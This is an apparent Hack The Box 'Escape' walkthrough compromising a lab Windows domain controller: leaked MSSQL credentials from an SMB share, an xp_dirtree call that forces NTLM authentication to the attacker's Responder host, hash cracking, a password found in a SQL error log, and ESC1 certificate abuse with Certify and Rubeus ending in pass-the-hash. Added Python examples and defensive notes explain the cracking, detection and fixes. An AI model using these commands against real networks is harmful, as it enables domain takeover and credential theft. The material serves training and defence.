HTB: Escape

Hack the box Escape walkthrough

Initial Enumeration

We can start off with an nmap scan:

nmap -sV -T4 -p- -Pn 10.129.228.253
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-06 10:14:24Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

The open ports (DNS, Kerberos, LDAP/LDAPS, SMB, WinRM on 5985, plus MSSQL on 1433) indicate that this is a domain controller; the service info line even gives the host name DC. The LDAP banners show the domain is sequel.htb (the trailing "0." is an artifact of nmap's banner parsing, not part of the name).

If we list SMB shares with a null session (-N), we see a non-default share named Public alongside the standard ones (escape.htb here is assumed to be an /etc/hosts entry pointing at the target IP):

smbclient -L //escape.htb -N
	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Public          Disk      
	SYSVOL          Disk      Logon server share 

The listing alone does not prove the share is readable, so we try to connect anonymously (press Enter at the password prompt):

smbclient //escape.htb/public

Running ls shows a single document, SQL Server Procedures.pdf, which we download with:

get "SQL Server Procedures.pdf"

The document describes an MSSQL instance running on the DC. Scrolling to the bottom, we find the credentials PublicUser : GuestUserCantWrite1.

Capture the hash with Responder

Using these creds, we can log into the SQL server with:

impacket-mssqlclient PublicUser@escape.htb

Looking around, there doesn't seem to be anything useful in the databases. However, the account that runs the MSSQL service will authenticate to UNC paths on our behalf: if we make the server touch an SMB share on our machine, Responder captures that account's NetNTLMv2 challenge/response. First set up Responder on the VPN interface:

sudo responder -I tun0

Then, from the mssqlclient prompt, make the server list a (non-existent) share on our host with xp_dirtree, which forces an SMB authentication attempt:

xp_dirtree '\\<ATTACKER-IP>\something'

Responder prints the NetNTLMv2 hash of the sql_svc service account; save the whole line to hash.txt.

This hash can be cracked with john (the netntlmv2 format is auto-detected from the line):

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This gives us the credential sql_svc : REGGIE1234ronnie.
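
To see what Responder captured and what john actually does with it, here is an added example (my own code, not part of the original walkthrough and not from Responder or john): it builds a constructed NetNTLMv2 capture line in Responder's user::domain:challenge:NTProofStr:blob format for the sql_svc password from this box, then recovers the password by recomputing NTProofStr = HMAC-MD5(HMAC-MD5(MD4(password), UPPER(user)+domain), challenge+blob) for each wordlist candidate. The server challenge, the blob contents and the wordlist are all made up here; MD4 is implemented in pure Python because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
# Added example (not from the original post): how NetNTLMv2 cracking works.
# Responder line format: "user::domain:serverChallenge:NTProofStr:blob" (all hex).
# The capture below is constructed here, not recorded from the box.
import hmac
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    mask = 0xFFFFFFFF
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        st = [a, b, c, d]
        rounds = (
            (F, 0, (3, 7, 11, 19), list(range(16))),
            (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
            (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
        )
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                p, q, r, s = [(j - i) % 4 for j in range(4)]  # rotate (a,b,c,d) -> (d,a,b,c) -> ...
                st[p] = rot((st[p] + fn(st[q], st[r], st[s]) + X[idx] + k) & mask, shifts[i % 4])
        a, b, c, d = ((x + y) & mask for x, y in zip((a, b, c, d), st))
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password (what a cracked NetNTLMv2 ultimately reveals)."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, serverChallenge || blob), NTOWFv2 = HMAC-MD5(NT hash, UPPER(user)+domain)."""
    ntowf_v2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(ntowf_v2, server_challenge + blob, "md5").digest()


def parse_responder_line(line: str):
    """Split Responder's 'user::domain:challenge:NTProofStr:blob' capture into its parts."""
    user, _, domain, challenge, proof, blob = line.strip().split(":", 5)
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def crack(line: str, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches the capture, else None."""
    user, domain, challenge, proof, blob = parse_responder_line(line)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, challenge, blob), proof):
            return candidate
    return None


def make_sample_line(password: str, user: str = "sql_svc", domain: str = "sequel") -> str:
    """Constructed capture: fixed server challenge and a minimal NTLMv2 blob (header, timestamp,
    client challenge, one AV pair for the NetBIOS domain name, EOL). Not a real recording."""
    server_challenge = bytes.fromhex("1122334455667788")
    av_pairs = struct.pack("<HH", 0x0002, 12) + "SEQUEL".encode("utf-16le") + struct.pack("<HH", 0, 0)
    blob = (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", 133221490000000000)
            + bytes.fromhex("8899aabbccddeeff") + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed inputs: the capture line for this box's sql_svc password and a tiny "rockyou".
SAMPLE_LINE = make_sample_line("REGGIE1234ronnie")
WORDLIST = ["password", "Password1", "GuestUserCantWrite1", "REGGIE1234ronnie", "NuclearMosquito3"]

if __name__ == "__main__":
    print("captured:", SAMPLE_LINE[:64] + "...")
    print("cracked :", crack(SAMPLE_LINE, WORDLIST))
```

john and hashcat (mode 5600) do exactly this loop, only with optimised MD4/MD5 and rules on top; the point to take away is that the capture is not reversible, so a long, unguessable service-account password would have stopped this path, and so would disabling outbound SMB/NTLM from the SQL host.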

Escalation to Ryan.Cooper

Port 5985 (WinRM) was open in the scan, so with the sql_svc credentials we can get a shell with evil-winrm:

evil-winrm -i $IP -u 'sql_svc' -p 'REGGIE1234ronnie'

If we look at the root of the C:\ drive, we find a SQLServer folder containing a Logs subfolder, and inside it a file ERRORLOG.BAK. Reading through the file carefully, we find a failed login for sequel.htb\Ryan.Cooper, followed shortly by a failed login for a "user" named NuclearMosquito3. A user name like that is almost certainly a password typed into the wrong field, so Ryan probably uses NuclearMosquito3 as his password.

We can confirm it is his password by logging in as Ryan.Cooper with evil-winrm:

evil-winrm -i $IP -u 'Ryan.Cooper' -p 'NuclearMosquito3'
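
The pattern above (a failure for a real account followed, seconds later and from the same client, by a failure for a "user" that matches no login) is easy to hunt for programmatically, whether you are an attacker reading ERRORLOG or a defender watching it. The following is an added example of my own, not from the original post: it parses constructed lines modelled on the SQL Server errorlog format and pairs each failure for a known login with a following unknown user name from the same client inside a short window. The sample lines, the IP addresses and the set of known logins are all constructed for the example.

```python
# Added example (not from the original post): spot "password typed as username" in a
# SQL Server ERRORLOG. Sample lines are constructed in the errorlog's format, not copied.
import re
from datetime import datetime, timedelta

SAMPLE_ERRORLOG = """\
2022-11-18 13:43:05.10 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.13]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.13]
2022-11-18 13:44:10.02 Logon       Logon failed for user 'sequel.htb\\sql_svc'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.20]
2022-11-18 13:59:12.77 Logon       Logon failed for user 'PublicUser'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.20]
"""

# Constructed: the logins that actually exist (compare case-insensitively).
KNOWN_LOGINS = {"sequel.htb\\ryan.cooper", "sequel.htb\\sql_svc", "publicuser"}

FAILED_LOGON = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) Logon\s+Logon failed for user "
    r"'(?P<user>[^']+)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logons(text: str):
    """Return (timestamp, user, client) for every 'Logon failed for user' line, in file order."""
    events = []
    for line in text.splitlines():
        m = FAILED_LOGON.match(line)
        if m:
            events.append((datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["user"], m["client"]))
    return events


def find_password_as_username(text: str, known_logins, window=timedelta(seconds=30)):
    """Pair a failure for a known login with a later failure from the same client whose
    'user name' is unknown and carries no domain prefix: a likely leaked password."""
    hits = []
    events = parse_failed_logons(text)
    for i, (ts, user, client) in enumerate(events):
        if user.lower() not in known_logins:
            continue  # only start from a failure for a real account
        for ts2, user2, client2 in events[i + 1:]:
            if ts2 - ts > window:
                break  # events are in time order, so nothing later can qualify
            if client2 == client and "\\" not in user2 and user2.lower() not in known_logins:
                hits.append((user, user2))
    return hits


if __name__ == "__main__":
    for account, candidate in find_password_as_username(SAMPLE_ERRORLOG, KNOWN_LOGINS):
        print(f"{account}: try password {candidate!r}")
```

On the defensive side the same check belongs in whatever ingests the SQL errorlog (or event ID 18456 in the Application log), because a "login" that looks like a password means a secret has just been written to disk in clear text and the account should be rotated.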

Escalation to Administrator

A common escalation path in AD environments is misconfigured Active Directory Certificate Services (AD CS). For a full overview of what we're about to do, see the following article: https://posts.specterops.io/certified-pre-owned-d95910965cd2. Essentially, we are going to abuse a certificate template that lets the enrollee choose the subject (the ESC1 case in that paper) to request a certificate with Administrator as the alternative name, use that certificate to obtain a TGT through PKINIT, recover the account's NTLM hash from the ticket, and log into the machine as an admin. We're going to use Certify.exe to find the vulnerable template and request the certificate. You can download a pre-compiled Certify.exe (and a pre-compiled Rubeus.exe, which we will need in a bit) from https://github.com/r3motecontrol/Ghostpack-CompiledBinaries. Running binaries someone else compiled is not something I would do in a real engagement, but it comes in handy for Hack the Box.

After uploading Certify.exe to the box (evil-winrm's upload command works for this), we can find vulnerable templates with:

.\certify.exe find /vulnerable

Certify reports a vulnerable template named UserAuthentication. We can request a certificate from it with Administrator as the alternative name:

.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

In the above command, sequel-DC-CA is the name of the Enterprise CA, which appears in the output of the find command (see screenshot). The altname is the account we want the certificate to authenticate as: the CA copies it into the certificate's subject alternative name without checking that the requester is that user, which is the whole bug.
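
To make "vulnerable template" concrete, here is an added example (my own code, not Certify's) that evaluates the ESC1 conditions from the Certified Pre-Owned paper over template attributes as they would be read from the configuration partition in LDAP: the enrollee may supply the subject, the EKUs (or their absence) permit client authentication, no manager approval, no authorized signatures, and a low-privileged group may enroll. The two templates are constructed for the example, and the enrollment ACL, which really comes from parsing the template's nTSecurityDescriptor, is simplified to a list of principals holding the Enroll right.

```python
# Added example, not Certify's code: the ESC1 checks behind "certify find /vulnerable",
# evaluated over template attributes as read from LDAP. Templates below are constructed;
# the enrollment ACL is simplified to a list of principals with Enroll.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag: manager approval

AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def esc1_findings(template):
    """Return the ESC1 conditions this template satisfies; it is abusable only if all five hold."""
    found = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        found.append("enrollee supplies subject (altname taken from the request)")
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list also permits client authentication
        found.append("certificate usable for Kerberos client authentication")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        found.append("no manager approval required")
    if template.get("msPKI-RA-Signature", 0) == 0:
        found.append("no authorized signature required")
    enrollers = LOW_PRIV_PRINCIPALS & set(template["enroll"])
    if enrollers:
        found.append("low-privileged enrollment: " + ", ".join(sorted(enrollers)))
    return found


def is_esc1(template):
    return len(esc1_findings(template)) == 5


# Constructed templates: one shaped like the ESC1 template this walkthrough abuses,
# one shaped like the built-in User template (subject built from AD, not from the request).
TEMPLATES = {
    "UserAuthentication": {
        "msPKI-Certificate-Name-Flag": 0x00000001,
        "msPKI-Enrollment-Flag": 0x00000000,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
        "enroll": ["Domain Admins", "Domain Users", "Enterprise Admins"],
    },
    "User": {
        "msPKI-Certificate-Name-Flag": 0xA6000000,  # SAN/subject required from the directory
        "msPKI-Enrollment-Flag": 0x00000029,        # constructed; manager-approval bit clear
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
        "enroll": ["Domain Admins", "Domain Users", "Enterprise Admins"],
    },
}

if __name__ == "__main__":
    for name, tpl in TEMPLATES.items():
        print(name, "ESC1" if is_esc1(tpl) else "ok", esc1_findings(tpl))
```

The fix follows from the checks: clearing ENROLLEE_SUPPLIES_SUBJECT (or requiring manager approval) on any template with an authentication EKU breaks the chain, and an enrollment ACL restricted to the groups that actually need the template removes the last condition.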

Copy the certificate output back to your host (everything from -----BEGIN RSA PRIVATE KEY----- through -----END CERTIFICATE-----, the key and the certificate together) and save it as cert.pem. It can then be converted to PFX format with:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Don't enter a password when prompted (if you do, Rubeus needs it via /password:).

Upload cert.pfx along with the Rubeus.exe you downloaded earlier. Then request a TGT for Administrator with the certificate; the /getcredentials flag makes Rubeus also recover the account's NTLM hash from the ticket's PAC (through a user-to-user request), so we don't even need to pass the ticket:

.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials

We can then log into the DC by passing the NTLM hash that Rubeus printed:

evil-winrm -i $IP -u 'Administrator' -H A52F78E4C751E5F5E17E1E9F3E58F4EE